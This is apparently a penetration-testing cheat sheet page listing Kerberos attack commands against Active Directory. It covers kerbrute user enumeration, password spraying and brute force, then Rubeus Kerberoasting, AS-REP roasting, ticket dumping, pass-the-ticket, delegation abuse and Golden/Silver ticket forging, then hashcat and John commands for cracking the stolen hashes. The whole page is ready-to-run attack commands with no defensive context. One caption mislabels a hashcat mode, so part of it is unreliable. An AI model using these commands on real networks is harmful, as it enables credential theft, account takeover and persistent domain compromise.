← All Cheatsheets

active-directory

Kerbrute & Rubeus — Kerberos Attacks

Kerbrute for username enumeration and password spraying; Rubeus for full Kerberos attack toolkit.

13 views Apr 2026 lazyhackers

Kerbrute (5)

kerbrute userenum --dc 10.10.10.1 -d domain.local users.txt

Enumerate valid usernames via Kerberos pre-auth

kerbrute userenum users

kerbrute passwordspray --dc 10.10.10.1 -d domain.local users.txt "Password1"

Password spray single password against user list

kerbrute spray password

kerbrute bruteuser --dc 10.10.10.1 -d domain.local rockyou.txt administrator

Brute force specific user

kerbrute bruteforce

kerbrute userenum --dc 10.10.10.1 -d domain.local users.txt -o valid_users.txt

Save valid users to file

kerbrute userenum output

kerbrute passwordspray --dc 10.10.10.1 -d domain.local users.txt "Summer2024!" --delay 1000

Spray with 1-second delay (avoid lockout)

kerbrute spray lockout

Rubeus — Kerberoasting & AS-REP Roasting (5)

Rubeus.exe kerberoast /outfile:hashes.txt

Kerberoast all SPNs in domain

rubeus kerberoast spn

Rubeus.exe kerberoast /user:svc_sql /outfile:hash.txt

Kerberoast specific service account

rubeus kerberoast

Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt

Kerberoast with RC4 only (opsec-safe)

rubeus kerberoast opsec

Rubeus.exe asreproast /outfile:asrep.txt

AS-REP Roast all users without pre-auth

rubeus asrep

Rubeus.exe asreproast /user:nopreauth_user /format:hashcat /outfile:asrep.txt

AS-REP Roast in hashcat format

rubeus asrep hashcat

Rubeus — Ticket Attacks (8)

Rubeus.exe dump /luid:0x3e4

Dump Kerberos tickets from memory (LUID)

rubeus tickets dump

Rubeus.exe dump /service:krbtgt /nowrap

Dump TGT tickets

rubeus tgt dump

Rubeus.exe ptt /ticket:ticket.kirbi

Pass-the-Ticket — inject .kirbi ticket

rubeus ptt

Rubeus.exe ptt /ticket:base64encodedticket

Pass-the-Ticket from base64 ticket

rubeus ptt base64

Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/server.domain.local

S4U2Proxy — constrained delegation abuse

rubeus s4u delegation

Rubeus.exe golden /rc4:KRBTGT_HASH /domain:domain.local /sid:S-1-5-21-xxx /user:administrator

Create Golden Ticket

rubeus golden-ticket

Rubeus.exe silver /rc4:SERVICE_HASH /domain:domain.local /sid:S-1-5-21-xxx /user:administrator /service:cifs/server

Create Silver Ticket

rubeus silver-ticket

Rubeus.exe harvest /interval:30

Harvest TGTs every 30 seconds

rubeus harvest tgt

Cracking Kerberos Hashes (4)

hashcat -m 13100 kerb_hashes.txt rockyou.txt

Crack Kerberoast TGS hashes (RC4)

hashcat crack kerberoast

hashcat -m 19700 kerb_hashes.txt rockyou.txt

Crack Kerberoast TGS hashes (AES128)

hashcat crack kerberoast aes

hashcat -m 18200 asrep_hashes.txt rockyou.txt

Crack AS-REP Roast hashes

hashcat crack asrep

john kerb_hashes.txt --wordlist=rockyou.txt --format=krb5tgs

Crack Kerberoast with John

john crack kerberoast